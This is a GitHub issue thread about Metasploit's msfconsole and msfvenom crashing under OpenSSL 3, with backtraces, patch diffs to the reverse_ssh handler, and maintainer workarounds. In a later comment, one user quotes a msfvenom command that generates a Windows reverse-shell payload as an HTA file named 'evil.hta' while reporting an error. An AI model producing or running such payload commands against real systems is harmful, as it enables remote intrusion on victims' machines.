rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

`initialize': unsupported (OpenSSL::Cipher::CipherError) #16767

Closed zontak closed 2 years ago

zontak commented 2 years ago

Steps to reproduce

After running the 'msfconsole' command, an error appears on the console.

Were you following a specific guide/tutorial or reading documentation?

https://www.darkoperator.com/installing-metasploit-in-ubunt

Expected behavior

To start metasploit without any problems.

Current behavior

An error appears on the console:

/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/functionable.rb:13:in `initialize': unsupported (OpenSSL::Cipher::CipherError)
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/functionable.rb:13:in `new'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/functionable.rb:13:in `included'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:14:in `include'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:14:in `<class:BlowfishCbc>'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:9:in `<class:EncryptionAlgorithm>'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:8:in `<class:Transport>'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:7:in `<module:HrrRbSsh>'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:6:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm.rb:19:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/kex_algorithm/iv_computable.rb:5:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/kex_algorithm/diffie_hellman.rb:7:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/kex_algorithm/diffie_hellman_group1_sha1.rb:4:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/kex_algorithm.rb:17:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport.rb:15:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh.rb:15:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /opt/metasploit-framework/lib/rex/proto/ssh/hrr_rb_ssh.rb:3:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /opt/metasploit-framework/lib/rex/proto/ssh/connection.rb:2:in `<top (required)>'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /var/lib/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35:in `require'
    from /opt/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb:146:in `default_version_string'
    from /opt/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb:40:in `initialize'
    from /opt/metasploit-framework/lib/msf/base/sessions/command_shell_options.rb:16:in `initialize'
    from /opt/metasploit-framework/modules/payloads/singles/cmd/unix/reverse_ssh.rb:16:in `initialize'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:95:in `new'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:95:in `block (2 levels) in recalculate'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:93:in `each_pair'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:93:in `block in recalculate'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:73:in `each_pair'
    from /opt/metasploit-framework/lib/msf/core/payload_set.rb:73:in `recalculate'
    from /opt/metasploit-framework/lib/msf/core/modules/loader/base.rb:258:in `block in load_modules'
    from /opt/metasploit-framework/lib/msf/core/modules/loader/base.rb:255:in `each'
    from /opt/metasploit-framework/lib/msf/core/modules/loader/base.rb:255:in `load_modules'
    from /opt/metasploit-framework/lib/msf/core/module_manager/loading.rb:170:in `block in load_modules'
    from /opt/metasploit-framework/lib/msf/core/module_manager/loading.rb:168:in `each'
    from /opt/metasploit-framework/lib/msf/core/module_manager/loading.rb:168:in `load_modules'
    from /opt/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
    from /opt/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
    from /opt/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
    from /opt/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:51:in `block in init_module_paths'
    from /opt/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `each'
    from /opt/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `init_module_paths'
    from /opt/metasploit-framework/lib/msf/ui/console/driver.rb:160:in `initialize'
    from /opt/metasploit-framework/lib/metasploit/framework/command/console.rb:60:in `new'
    from /opt/metasploit-framework/lib/metasploit/framework/command/console.rb:60:in `driver'
    from /opt/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
    from /opt/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
    from /usr/local/bin/msfconsole:23:in `<main>'

Metasploit version

6.2.7-dev-

Additional Information

I cannot run msfconsole to activate loglevel 3 :(

h00die commented 2 years ago

I have experienced this as well. The termux forums have a patch you can apply to fix it, but an official answer or fix would be good.

adfoster-r7 commented 2 years ago

What ubuntu version + Ruby version is this triggering with? 👀

h00die commented 2 years ago

Ubuntu 22 for me, whatever the stock ruby from apt was

adfoster-r7 commented 2 years ago

I believe the legacy bf-cbc cipher has been marked as deprecated in OpenSSL 3 and is now no longer loaded by default: https://www.openssl.org/docs/man3.0/man7/OSSL_PROVIDER-legacy.html which causes the ssh gem that Metasploit uses to die.

It doesn't look like there's a way to configure the provider via Ruby currently https://github.com/ruby/openssl/issues/500

I've cross-posted an issue over in hrr_rb_ssh https://github.com/hirura/hrr_rb_ssh/issues/32 for visibility to the gem author too


Workarounds

1) Temporarily rename the ssh module so it doesn't crash on start up:

mv ./modules/payloads/singles/cmd/unix/reverse_ssh.rb ./modules/payloads/singles/cmd/unix/reverse_ssh_soft_deletion

There might be other openssl issues in modules, I haven't sanity tested other modules yet.

2) Or: the nightly installers work, as they come bundled with an older OpenSSL version: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

jmartin-tech commented 2 years ago

Short term also consider utilizing RVM or some other Ruby environment manager to build Ruby against the older OpenSSL versions for the time being. The shift to OpenSSL3 while still supporting older ciphers is going to take some time.

shadergz commented 2 years ago

I had the same issue too! I can't create anything with MSFvenom! Using: Framework Version: 6.2.6-dev

adfoster-r7 commented 2 years ago

The crash should be fixed in this week's 6.2.8 release. If you are on Kali, this version is not yet available and you'll have to apply a work around for now.

Workarounds

Ubuntu (Anything other than Kali)

Kali

Apply this patch locally to /usr/share/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb

diff --git a/lib/msf/core/handler/reverse_ssh.rb b/lib/msf/core/handler/reverse_ssh.rb
index 9917ad4460..cf2b1bc472 100644
--- a/lib/msf/core/handler/reverse_ssh.rb
+++ b/lib/msf/core/handler/reverse_ssh.rb
@@ -145,8 +145,12 @@ module Msf
       def default_version_string
         require 'rex/proto/ssh/connection'
         Rex::Proto::Ssh::Connection.default_options['local_version']
+      rescue OpenSSL::OpenSSLError => e
+        print_error("ReverseSSH handler did not load with OpenSSL version #{OpenSSL::VERSION}")
+        elog(e)
+        'SSH-2.0-OpenSSH_5.3p1'
       rescue LoadError => e
        print_error("This handler requires PTY access not available on all platforms.")
         elog(e)
         'SSH-2.0-OpenSSH_5.3p1'
       end
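Review bot: the new `rescue OpenSSL::OpenSSLError => e` clause stops the crash but leaves the retry loop in place. `default_version_string` is called from `initialize` of every reverse_ssh payload instance (payload_set.rb:95 in the backtrace above), and each call re-runs `require 'rex/proto/ssh/connection'`; because the previous require aborted with an exception, Ruby never recorded the hrr_rb_ssh files as loaded, so the next call re-executes their class bodies and constant assignments. That is the source of the repeated "already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::NAME" warnings shown further down, and `print_error` fires once per payload instead of once. Cache the fallback after the first failure (for example `@default_version_string ||= begin ... end`, or a class-level flag set in the rescue) so the require and the error message happen only once per process.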

I'll keep this ticket open for now, as there are now going to be warnings generated instead of crashing - which can be ignored:

$ bundle exec ruby ./msfconsole
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:10: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::NAME
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:10: warning: previous definition of NAME was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:11: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::PREFERENCE
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:11: warning: previous definition of PREFERENCE was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:12: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::CIPHER_NAME
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:12: warning: previous definition of CIPHER_NAME was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:13: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::BLOCK_SIZE
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:13: warning: previous definition of BLOCK_SIZE was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:10: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::NAME
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:10: warning: previous definition of NAME was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:11: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::PREFERENCE
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:11: warning: previous definition of PREFERENCE was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:12: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::CIPHER_NAME
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:12: warning: previous definition of CIPHER_NAME was here
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:13: warning: already initialized constant HrrRbSsh::Transport::EncryptionAlgorithm::BlowfishCbc::BLOCK_SIZE
/var/lib/gems/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/encryption_algorithm/blowfish_cbc.rb:13: warning: previous definition of BLOCK_SIZE was here

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .

       =[ metasploit v6.2.7-dev-f18392adb1                ]
+ -- --=[ 2228 exploits - 1175 auxiliary - 398 post       ]
+ -- --=[ 864 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can pivot connections over sessions 
started with the ssh_login modules

msf6 >

ksaadDE commented 2 years ago

Someone put a report on the Kali bug tracker^^ https://bugs.kali.org/view.php?id=7804

smortex commented 2 years ago

Some issues in the repo are closed and link to the above workaround for Kali Linux (i.e. #16782, #16783, #16780) but the exception we got there is not the same as the one in this issue. The workaround needs to be adjusted accordingly in /usr/share/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb (rescue OpenSSL::PKey::PKeyError instead of OpenSSL::Cipher::CipherError):

diff --git a/lib/msf/core/handler/reverse_ssh.rb b/lib/msf/core/handler/reverse_ssh.rb
index 9917ad4460..cf2b1bc472 100644
--- a/lib/msf/core/handler/reverse_ssh.rb
+++ b/lib/msf/core/handler/reverse_ssh.rb
@@ -145,8 +145,12 @@ module Msf
       def default_version_string
         require 'rex/proto/ssh/connection'
         Rex::Proto::Ssh::Connection.default_options['local_version']
+      rescue OpenSSL::PKey::PKeyError => e
+        print_error("ReverseSSH handler did not load with OpenSSL version #{OpenSSL::VERSION}")
+        elog(e)
+        'SSH-2.0-OpenSSH_5.3p1'
       rescue LoadError => e
        print_error("This handler requires PTY access not available on all platforms.")
         elog(e)
         'SSH-2.0-OpenSSH_5.3p1'
       end
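Review bot: `rescue OpenSSL::PKey::PKeyError => e` trades one too-narrow class for another: it covers the `generate_key!` failure from ecdsa_sha2_nistp256.rb but no longer catches the `OpenSSL::Cipher::CipherError` from blowfish_cbc.rb that the original report hit, so which of the two a given box sees depends only on which hrr_rb_ssh file zeitwerk loads first. Both classes inherit from `OpenSSL::OpenSSLError`; rescue that base class (as the amended workaround earlier in the thread does) instead of enumerating subclasses. The `index 9917ad4460..cf2b1bc472` line is also copied verbatim from the first diff although the hunk body differs, so it does not describe this change.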

adfoster-r7 commented 2 years ago

Thanks for the update @smortex - I've updated the original workaround to catch the base class OpenSSL::OpenSSLError for now, and we'll aim to get a fix into metasploit itself as well :+1:

nandy6666 commented 2 years ago

Still receiving some warnings when launching msfconsole, even after updating the lines of code in reverse_ssh.rb file

/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here

bcoles commented 2 years ago

Still receiving some warnings when launching msfconsole, even after updating the lines of code in reverse_ssh.rb file

Correct. There will be warnings generated instead of crashing - which can be ignored.

https://github.com/rapid7/metasploit-framework/issues/16767#issuecomment-1185395510

Manangoel98 commented 2 years ago

https://github.com/rapid7/metasploit-framework/issues/16767#issuecomment-1185395510

I followed this comment but am still getting an error when running: bundle exec ruby ./msfvenom

ghost commented 2 years ago

https://github.com/rapid7/metasploit-framework/issues/16767#issuecomment-1185395510 Hi, new to this. How do I manually apply the Kali Linux patch? Or, more specifically, how do I make a custom patch and apply it accordingly? tq

bcoles commented 2 years ago

#16767 (comment) Hi, new to this. How do I manually apply the Kali Linux patch? Or, more specifically, how do I make a custom patch and apply it accordingly? tq

The patch is in diff format.

Modify /usr/share/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb.

Red lines are bad. Green lines are good. - means bad. + means good. Remove the bad lines. Add the good lines. This diff has no bad lines. Add the good lines.

Note that the above diff may be insufficient as per #16792.

Or alternatively, wait until an updated version of Metasploit is released with the patch applied.

bcoles commented 2 years ago

#16767 (comment)

I followed this comment but am still getting an error when running: bundle exec ruby ./msfvenom

The above patch may be insufficient as per #16792, but it is impossible to say without knowing what error message you are getting.

Manangoel98 commented 2 years ago

Newly added lines (code taken from the GitHub report for Metasploit Framework):

      rescue OpenSSL::Cipher::CipherError => e
        print_error("ReverseSSH handler did not load with OpenSSL version #{OpenSSL::VERSION}")
        elog(e)
        'SSH-2.0-OpenSSH_5.3p1'

ERROR:

└─$ bundle exec ruby ./msfvenom -p windows/shell_reverse_tcp LHOST=192.168.188.10 LPORT=443 -f hta-psh -o evil.hta

/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:14:in `generate_key!': pkeys are immutable on OpenSSL 3.0 (OpenSSL::PKey::PKeyError)
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:14:in `<class:EcdsaSha2Nistp256>'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:10:in `<class:ServerHostKeyAlgorithm>'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:9:in `<class:Transport>'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:8:in `<module:HrrRbSsh>'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:7:in `<top (required)>'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm.rb:19:in `<top (required)>'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport.rb:16:in `<top (required)>'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh.rb:15:in `<top (required)>'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/lib/rex/proto/ssh/hrr_rb_ssh.rb:3:in `<top (required)>'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/lib/rex/proto/ssh/connection.rb:2:in `<top (required)>'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/zeitwerk-2.6.0/lib/zeitwerk/kernel.rb:35:in `require'
    from /usr/share/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb:146:in `default_version_string'
    from /usr/share/metasploit-framework/lib/msf/core/handler/reverse_ssh.rb:40:in `initialize'
    from /usr/share/metasploit-framework/lib/msf/base/sessions/command_shell_options.rb:16:in `initialize'
    from /usr/share/metasploit-framework/modules/payloads/singles/cmd/unix/reverse_ssh.rb:16:in `initialize'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:95:in `new'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:95:in `block (2 levels) in recalculate'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:93:in `each_pair'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:93:in `block in recalculate'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:73:in `each_pair'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:73:in `recalculate'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:258:in `block in load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:255:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:255:in `load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:170:in `block in load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:168:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:168:in `load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:51:in `block in init_module_paths'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `each'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `init_module_paths'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:124:in `simplify'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:72:in `create'
    from ./msfvenom:54:in `init_framework'
    from ./msfvenom:67:in `framework'
    from ./msfvenom:472:in `<main>'

bcoles commented 2 years ago

OpenSSL::PKey::PKeyError should be caught by:

      rescue OpenSSL::OpenSSLError => e

As per:

https://github.com/rapid7/metasploit-framework/pull/16792/files

Manangoel98 commented 2 years ago

So now what should I do, as I am preparing for an exam?

bcoles commented 2 years ago
